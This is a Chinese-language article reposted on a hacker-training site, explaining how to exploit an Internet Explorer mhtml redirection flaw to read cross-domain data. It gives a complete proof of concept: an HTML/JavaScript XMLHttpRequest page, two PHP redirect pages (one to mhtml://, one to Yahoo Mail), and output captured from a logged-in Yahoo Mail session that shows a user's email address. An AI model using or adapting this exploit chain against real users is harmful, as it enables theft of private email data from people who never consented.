IE mhtml redirection漏洞利用方法 - 中华隐士黑客联盟,全国最大的免费黑客技术培训基地! 免费一切,共享一切!

IE mhtml redirection漏洞利用方法
作者：不详来源：转载发布时间：2007-3-26 14:06:41 发布人：heigeheapao

这个漏洞主要是信息泄露，参见http://secunia.com/advisories/19738/的具体描述。为了保证客户端安全，xmlhttp是无法跨域获取信息的。但是IE出现安全问题，在服务端通过mhtml重定向漏洞，可以利用xmlhttp跨域获取敏感信息。我测试是我登陆了Yahoo Mail之后，通过漏洞可以成功获取到邮件资料。漏洞报告说影响IE6.0，我使用IE7同样遭到攻击。

下面是主页面，通过xmlhttp请求本域的页面。（这里改成直接访问其他域会出现拒绝访问错误）

<html>

<head>

<script language="JavaScript">

// Start XML HTTP Request Object

var request = InitXMLHttpRequest();

function StartTest()

{

document.getElementById("result").innerHTML = "init ok<br />";

document.getElementById("result").innerHTML += "begain open<br /> ";

// Open/

request.open('GET', 'http://www.icylife.net/valu1.php', true);

document.getElementById("result").innerHTML += "begain send<br /> ";

request.onreadystatechange = WhenDone;

// Make the request

request.send();

}

// Function for Initialising the XMLHttpRequest

function InitXMLHttpRequest()

{

var request;

try

{

request = new XMLHttpRequest();

}

catch (trymicrosoft)

{

try

{

request = new ActiveXObject("Msxml2.XMLHTTP");

}

catch (othermicrosoft)

{

try

{

request = new ActiveXObject("Microsoft.XMLHTTP");

}

catch (failed)

{

request = false;

}

}

}

// Initialised?

if ( !request )

{

alert("Due to limitations of your browser you will not be able to use this page.");

}

else

{

return request;

}

}

function WhenDone( )

{

if ( request.readyState == 4 )

{

document.getElementById("result").innerHTML = request.responseText;

}

}

</script>

</head>

<body>

<b>Start the test:</b><br>

<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now</font></a></div>

<br />

<div id="result"></div>

</body>

</html>

这里是第二个页面，利用mhtml重定向，代码很简单。

<?php

header("Location: mhtml://http://icylife.net/valu2.php");

?>

再就是第三个，重定向到yahoo mail。

<?php

header("Location: http://mail.yahoo.com.cn/");

?>

我登陆了mail之后，攻击结果片段如下：

<html>

<head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=gb2312">

<title>

Yahoo!电邮 - wustyunshu@yahoo.com.cn</title>

<script type="text/javascript">



</script>

<noscript>

<META HTTP-EQUIV=Refresh CONTENT="0; URL=/ym/login?nojs=1">

</noscript>

黑客软件：	漏洞扫描 \| 木马间谍 \| 加密解密 \| 远程控制 \| 破坏攻击 \| 杀毒软件 \| 防火墙类 \| OICQ专区 \| 黑客必备 \| 常用工具 \| 网吧攻击
文章中心：	最新资讯 \| 黑客技术 \| 电脑基础 \| 菜鸟文摘 \| 网络安全 \| 网络技巧 \| QQ技巧 \| OQ空间代码 \| 免费资源 \| 编程世界 \| 建站技术
素材源码：	论坛相关 \| ASP源码 \| CGI 源码 \| NET 源码 \| PHP 源码 \| 酷站素材 \| 字体素材 \| 图片素材 \| 友情发布 \| 网页模版 \| 建站软件
教程动画：	黑客教程 \| 黑客编程 \| 网站入侵 \| 菜鸟教程 \| 入侵教程 \| 破解教程 \| 电子书籍 \| 网页制作 \| 高级会员 \| 综合教程 \| 本站原创